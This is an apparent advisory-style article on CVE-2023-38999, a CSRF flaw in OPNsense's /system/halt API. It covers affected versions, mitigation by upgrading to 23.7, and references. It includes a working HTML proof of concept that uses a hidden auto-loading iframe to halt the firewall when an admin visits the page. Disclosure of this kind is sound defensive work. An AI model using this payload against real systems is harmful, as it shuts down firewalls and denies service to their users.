CVE-2023-38999 - OPNsense System Halt API CSRF Vulnerability Leads to DoS Attacks

---
A recent security update has uncovered a Cross-Site Request Forgery (CSRF) vulnerability in the System Halt API (/system/halt) of OPNsense, a widely used open-source firewall and security platform. The vulnerability, officially designated as CVE-2023-38999, affects OPNsense systems running prior to version 23.7. Attackers can potentially exploit this vulnerability to cause Denial of Service (DoS) attacks via a specially crafted GET request. This article will cover the vulnerability details, a code snippet of the exploit, and share the original references for this bug.

CVE Details

---
CVE-ID: CVE-2023-38999
Affected Systems: OPNsense before 23.7
Severity: Medium
Impact: Denial of Service (DoS)
Attack Vector: Cross-Site Request Forgery (CSRF) via the System Halt API

Vulnerability Description

---
The OPNsense System Halt API is responsible for shutting down the system when a user initiates the halt command. However, due to insufficient protections against CSRF attacks, a malicious party can use a crafted GET request to trigger the API, resulting in the system halting and causing a denial of service for legitimate users.

Code Snippet

---
The following code snippet demonstrates the exploit utilizing a simple HTML file to initiate a GET request via a hidden iframe:

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2023-38999 Exploit Example</title>
  <script>
    function exploit() {
      document.getElementById("exploitFrame").src = "http://opnsense.example.com/system/halt";;
    }
  </script>
</head>
<body onload="exploit()">
  <h1>Trying to exploit CVE-2023-38999...</h1>
  <iframe id="exploitFrame" style="display: none"></iframe>
</body>
</html>

Once the attacker convinces the victim (i.e., someone with access to the OPNsense UI) to visit the above HTML file, the exploit() function will run and trigger the System Halt API, hence causing the firewall to shut down and initiate the DoS attack.

Mitigation

---
The vulnerability is fixed in OPNsense version 23.7. It is highly recommended for users to update their OPNsense systems to the latest version by following the official upgrade guide: https://docs.opnsense.org/manual/install.html#upgrade

Original References

---

The original references and sources for this vulnerability are cited below

1. OPNsense Security Advisory: https://github.com/opnsense/core/security/advisories/GHSA-8597-3xh7-wprm
2. CVE Details - NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-38999
3. MITRE CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38999

Conclusion

---
Cross-Site Request Forgery vulnerabilities, like the one discussed in this article, can have severe consequences on the security and stability of any software system. By exploiting this vulnerability, an attacker may put the privacy and safety of the affected users at risk. It is essential to keep your systems up-to-date with the latest security patches and prioritize addressing known vulnerabilities.

Timeline

Published on: 08/09/2023 19:15:00 UTC
Last modified on: 08/15/2023 15:08:00 UTC